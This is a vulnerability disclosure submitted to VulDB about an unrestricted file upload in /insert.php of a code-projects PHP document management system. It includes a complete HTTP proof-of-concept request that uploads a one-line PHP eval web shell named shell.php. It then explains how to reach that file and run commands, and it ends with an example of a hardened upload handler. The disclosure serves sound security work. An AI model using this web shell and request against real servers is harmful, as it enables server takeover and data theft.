Submit #621411: code-projects document-management-system-in-php-with-source-code v1.0 Unrestricted Upload - Info

Title: code-projects document-management-system-in-php-with-source-code v1.0 Unrestricted Upload
Description:

# Document Management System In PHP With Source Code v1.0 /insert.php Unrestricted Upload

## Vendor Homepage
https://code-projects.org/

## Submitter
mawenjie

## Vulnerable File
- /insert.php

## VERSION(S)
- V1.0

## Software Link
- https://code-projects.org/document-management-system-in-php-with-source-code/

## Vulnerability Type
- Unrestricted Upload

## Root Cause
In Document Management System In PHP With Source Code v1.0, `/insert.php` accepts files uploaded after login, when adding content to the page, without any restrictions or filtering, which leads to an unrestricted upload vulnerability.

#### The source code is not filtered.
<img width="787" height="395" alt="Image" src="https://github.com/user-attachments/assets/b0344071-d4e4-4d3d-b967-798abafbf58d" />

## Impact
File upload vulnerabilities are extremely harmful. Attackers can upload malicious scripts (such as a WebShell) to directly control the server, view, tamper with or delete files, execute system commands, and even create administrator accounts. The server may become a "zombie" and be used for DDoS attacks, sending spam, etc. At the same time, the database is vulnerable to intrusion, sensitive information such as user privacy and commercial secrets may be stolen or tampered with, and website pages may be maliciously replaced, damaging the platform's reputation. In addition, the vulnerability may become a springboard for attacking other systems, triggering chained security issues and posing multi-dimensional threats to servers, data and users.

# DESCRIPTION
PHP document management system, source code v1.0. After logging in, a user can upload files when adding content to the page. The page index.php references the upload function in the /insert.php file, which triggers the unrestricted upload vulnerability: there are no restrictions or filters. Remote attackers can pass malicious payloads through this file upload function, so file uploads are unrestricted, which further leads to remote code execution (RCE).

# Vulnerability details and POC

## Payload
```http
POST /insert.php HTTP/1.1
Host: 192.168.126.133:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Length: 1608
Origin: http://192.168.126.133:8088
Connection: keep-alive
Referer: http://192.168.126.133:8088/index.php
Cookie: PHPSESSID=f3p49bjml603prg0rrp6drf5d5
Upgrade-Insecure-Requests: 1
Priority: u=0, i

------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field1"

5201-
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="anothercont"

1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="yr"


------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field2"

external
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field3"

1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="uploaded_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php @eval($_POST['shell']);?>
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field4"

1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field5"

1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field6"

domesca
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="newco"

1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field7"

henry
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="anotheremp"

1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field8"

2025-07-23
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8--
```

<img width="811" height="424" alt="Image" src="https://github.com/user-attachments/assets/8aff60bd-b8cf-43d3-a8bf-608b8d968d6d" />

#### According to the Burp packet analysis, obtain the file path and access it to execute commands
<img width="583" height="377" alt="Image" src="https://github.com/user-attachments/assets/12fcd569-82a4-4fc9-b1f0-2c536dcf1e98" />
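
One way to close the gap described under Root Cause, as an added example that is not code from the project or from the report: a handler for the `uploaded_file` field that allowlists the extension, checks the sniffed content type, and stores the file under a server-generated name. The allowlist, the size limit, the `UPLOAD_DIR` path and the function name `store_upload` are assumptions.

```php
<?php
// Added example (not code from insert.php): validated handling of the
// "uploaded_file" form field. Allowlist, size limit and storage path are assumptions.
declare(strict_types=1);

const ALLOWED_TYPES = [            // extension => MIME type the content must sniff as
    'pdf' => 'application/pdf',
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
];
const MAX_BYTES  = 10 * 1024 * 1024;
const UPLOAD_DIR = '/var/app-data/uploads';   // hypothetical path outside the web root

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed');
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('File size not allowed');
    }
    // The client-supplied name is used only to read the extension.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        throw new RuntimeException('File type not allowed');   // rejects .php, .phtml, ...
    }
    // Sniff the content: the Content-Type header of the part is client-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException('Content does not match extension');
    }
    // Server-generated name: no user-chosen path or file name reaches the disk.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $stored)) {
        throw new RuntimeException('Could not store file');
    }
    chmod(UPLOAD_DIR . '/' . $stored, 0640);
    return $stored;   // persist next to the original display name in the database
}

try {
    $name = store_upload($_FILES['uploaded_file'] ?? []);
} catch (RuntimeException $e) {
    http_response_code(400);
    exit('Upload rejected');
}
```

Keeping the storage directory outside the document root means a file that slips past these checks is still never interpreted as PHP by the web server.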
Source: ⚠️ https://github.com/XiaoJiesecqwq/CVE/issues/4
User: Anonymous User
Submission: 23/07/2025 12:09 (9 months ago)
Moderation: 25/07/2025 09:38 (2 days later)
Status: Accepted
VulDB entry: 317585 [code-projects Document Management System 1.0 /insert.php uploaded_file privilege escalation]
Points: 20
